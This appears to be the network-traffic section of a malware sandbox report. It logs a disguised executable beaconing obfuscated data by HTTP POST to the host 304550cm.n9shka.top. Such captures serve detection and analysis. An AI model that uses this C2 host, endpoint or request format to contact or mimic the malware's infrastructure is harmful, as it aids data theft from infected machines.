                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:17.310313940 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:17.665839911 CEST2532OUTData Raw: 5b 5e 5c 55 5a 5f 5b 5e 5c 5a 51 56 57 52 57 57 50 58 5e 58 54 59 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [^\UZ_[^\ZQVWRWWPX^XTYSITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%_8-^>97^ V$>Y0?*8$%9'[6>6+&<'4\-#G X/
                                                          Sep 8, 2024 11:52:17.976203918 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:18.176503897 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:17 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.44975280.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:18.317027092 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:18.665863991 CEST2532OUTData Raw: 5b 59 5c 53 5f 59 5b 5e 5c 5a 51 56 57 5d 57 53 50 5b 5e 5a 54 5f 53 41 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [Y\S_Y[^\ZQVW]WSP[^ZT_SATRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&81) 7X>Z#\0/%/B;'_'5)_+5'0;.#G X/9
                                                          Sep 8, 2024 11:52:18.987389088 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:19.116755962 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:18 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.44975380.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:19.246618986 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:19.603374958 CEST2532OUTData Raw: 5b 5c 5c 57 5a 52 5e 5c 5c 5a 51 56 57 59 57 5d 50 5a 5e 5c 54 55 53 44 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [\\WZR^\\ZQVWYW]PZ^\TUSDTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&/!2=9 V/*#$?>/4%:+6>+37 ^:#G X/)
                                                          Sep 8, 2024 11:52:19.650043011 CEST1236OUTData Raw: 2c 31 01 05 32 5d 0b 42 34 30 01 20 3e 5a 2e 1d 23 38 08 3d 35 58 19 22 3b 30 30 3f 3e 54 27 30 33 05 12 02 21 2e 2d 58 33 06 03 3d 35 33 15 35 33 06 1a 02 0e 27 1d 54 34 2a 09 18 09 01 25 13 35 39 31 2f 03 1b 3a 44 34 57 31 27 36 55 32 25 38 33
                                                          Data Ascii: ,12]B40 >Z.#8=5X";00?>T'03!.-X3=5353'T4*%591/:D4W1'6U2%83,4/>21ZE-9&5%5+1#%3[8)_0_S&;!7;46$8?3Z9;=)Y38V *#>=33!#2:/_?#1#?2;'6663<\(8X 0@,2<--_C5\#<&&.1"D4?]285'<-
                                                          Sep 8, 2024 11:52:19.923357964 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:20.138448000 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:19 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.44975480.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:20.218888998 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1400
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.44975580.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:20.315707922 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:20.665802002 CEST2532OUTData Raw: 5e 5b 5c 53 5a 5c 5b 51 5c 5a 51 56 57 59 57 56 50 5d 5e 5f 54 5f 53 40 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^[\SZ\[Q\ZQVWYWVP]^_T_S@TRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%/:*9^73'*<'<9Z/4%*$"<6807:;#G X/)
                                                          Sep 8, 2024 11:52:20.980123997 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:21.109177113 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:20 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.44975680.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:21.232206106 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:52:21.587627888 CEST2532OUTData Raw: 5b 5e 59 52 5a 5f 5e 58 5c 5a 51 56 57 5f 57 50 50 5e 5e 51 54 5e 53 47 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [^YRZ_^X\ZQVW_WPP^^QT^SGTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&;"!^>) # *?3'=\8,%9,"=")%?X$' _9#G X/1
                                                          Sep 8, 2024 11:52:21.904670000 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:22.105689049 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:21 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.44975780.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:22.231185913 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:22.587646961 CEST2528OUTData Raw: 5b 58 5c 54 5a 52 5b 5e 5c 5a 51 56 57 5b 57 5d 50 50 5e 5a 54 5a 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [X\TZR[^\ZQVW[W]PP^ZTZSFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%^/11?9/]7=,,3&;'V'/#.<50$7 [/+#G X/
                                                          Sep 8, 2024 11:52:22.897002935 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:23.108097076 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:22 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.44975880.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:23.230359077 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:23.587661982 CEST2532OUTData Raw: 5b 59 59 52 5f 5e 5e 5a 5c 5a 51 56 57 5e 57 50 50 5a 5e 5c 54 5c 53 40 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [YYR_^^Z\ZQVW^WPPZ^\T\S@TRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%Z8:*9']400>Z(3<!Z,?3946=*?&_'7#.#G X/5
                                                          Sep 8, 2024 11:52:23.915910959 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:24.052599907 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:23 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.44975980.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:24.184771061 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:24.540755987 CEST2532OUTData Raw: 5e 5b 59 54 5a 5b 5e 5f 5c 5a 51 56 57 5c 57 5c 50 5b 5e 5f 54 5e 53 48 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^[YTZ[^_\ZQVW\W\P[^_T^SHTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&.21\>)]#8[)3_'";B<3+["=)[(53X$4:+#G X/
                                                          Sep 8, 2024 11:52:24.855643988 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:24.986383915 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:24 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.44976080.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:25.106090069 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.44976180.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:25.328500032 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1412
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:25.681519032 CEST1412OUTData Raw: 5e 5e 59 53 5f 5e 5b 5f 5c 5a 51 56 57 59 57 52 50 59 5e 59 54 5d 53 42 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^^YS_^[_\ZQVWYWRPY^YT]SBTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%\;!)8#0]>3X35Z/7$%9#"?+Z37-+#G X/)
                                                          Sep 8, 2024 11:52:26.001065016 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:26.210725069 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:25 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0d 11 25 0f 24 2f 3d 5c 21 2e 2b 11 3d 06 35 55 3a 13 09 00 29 07 35 41 2a 55 24 1c 3e 06 32 5e 3d 2b 31 43 3d 12 3b 03 20 31 27 11 31 1f 28 5e 03 11 20 01 36 3e 32 58 2a 17 31 03 29 31 24 5f 2a 3c 2f 58 35 24 01 0c 23 38 20 11 20 06 25 0a 3c 07 22 12 38 34 3e 1d 2e 20 31 0c 36 34 2d 57 0c 12 20 18 3f 58 28 09 20 33 3e 07 32 3e 26 01 33 40 2e 5e 29 16 2a 55 2a 28 25 00 24 21 3f 1d 24 13 25 59 3d 38 3a 5e 30 17 01 59 22 2d 24 53 2d 0c 22 54 00 3d 5c 56
                                                          Data Ascii: %$/=\!.+=5U:)5A*U$>2^=+1C=; 1'1(^ 6>2X*1)1$_*</X5$#8 %<"84>. 164-W ?X( 3>2>&3@.^)*U*(%$!?$%Y=8:^0Y"-$S-"T=\V


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.44976280.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:25.450258017 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:25.806585073 CEST2532OUTData Raw: 5b 50 5c 57 5a 5e 5b 5a 5c 5a 51 56 57 5a 57 50 50 5d 5e 5f 54 5b 53 42 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [P\WZ^[Z\ZQVWZWPP]^_T[SBTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&/=:( #3*?+%,&/$%9;^6%Y(&,077.;#G X/%
                                                          Sep 8, 2024 11:52:26.132617950 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:26.264496088 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:25 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.44976380.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:26.387701035 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:52:26.743978024 CEST2532OUTData Raw: 5b 58 5c 57 5a 5c 5b 5a 5c 5a 51 56 57 59 57 56 50 5d 5e 51 54 5e 53 44 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [X\WZ\[Z\ZQVWYWVP]^QT^SDTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&,"*)'# >Z00<)-4$0$6-)^(%33$<\/+#G X/)
                                                          Sep 8, 2024 11:52:27.048445940 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:27.251797915 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:26 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.46471380.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:27.371238947 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:27.728380919 CEST2532OUTData Raw: 5e 5c 5c 51 5a 5d 5b 5e 5c 5a 51 56 57 5f 57 5d 50 50 5e 58 54 5b 53 42 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^\\QZ][^\ZQVW_W]PP^XT[SBTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&;!->4),$$)/;U046>!?3&'49#G X/1
                                                          Sep 8, 2024 11:52:28.037736893 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:28.165520906 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:27 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z
                                                          Sep 8, 2024 11:52:28.415688992 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:27 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.46471480.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:28.416476011 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:28.775190115 CEST2528OUTData Raw: 5b 5b 59 54 5f 58 5b 5e 5c 5a 51 56 57 5b 57 52 50 50 5e 58 54 5c 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [[YT_X[^\ZQVW[WRPP^XT\SFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%/W")9 ;*?0/%^;';T$#X"--[)5 $'<-;#G X/
                                                          Sep 8, 2024 11:52:29.099853039 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:29.232681990 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
